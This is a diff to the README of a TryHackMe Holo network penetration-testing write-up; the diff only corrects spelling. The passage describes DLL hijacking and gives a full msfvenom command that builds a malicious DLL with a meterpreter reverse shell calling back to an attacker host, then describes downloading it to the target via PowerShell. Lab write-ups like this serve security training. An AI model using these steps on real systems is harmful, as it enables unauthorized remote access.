austin-lai/External-Penetration-Testing-Holo-Corporate-Network-TryHackMe-Holo-Network/README.md

 It is exploitable with DLL hijacking.

-First we create a malicious DLL that embeded reverse shell meterpreter module form metasploit for the vulnerable application using ` msfvenom ` on out attcker machine as per below command.
+First we create a malicious DLL that embedded reverse shell meterpreter module form metasploit for the vulnerable application using ` msfvenom ` on out attacker machine as per below command.

 ```bash
 sudo msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.50.103.20 LPORT=16666 -f dll -o kavremoverENU.dll
 ```

-Then we use the same ` Invoke-WebRequest ` powershell command to download the malicious DLL from our attacker machine to target syetm under ` C:\Windows\Tasks `
+Then we use the same ` Invoke-WebRequest ` powershell command to download the malicious DLL from our attacker machine to target system under ` C:\Windows\Tasks `

-In order for the exploit to work, we have to copy the vulnerable application from original folder to ` C:\Windows\Tasks `, as the DLL hijacking work when the vunerable application start; it will search for DLL in the same folder, this is how we exploit it.
+In order for the exploit to work, we have to copy the vulnerable application from original folder to ` C:\Windows\Tasks `, as the DLL hijacking work when the vulnerable application start; it will search for DLL in the same folder, this is how we exploit it.

 Next, we setup the metasploit multi-handler module on our attacker machine as below: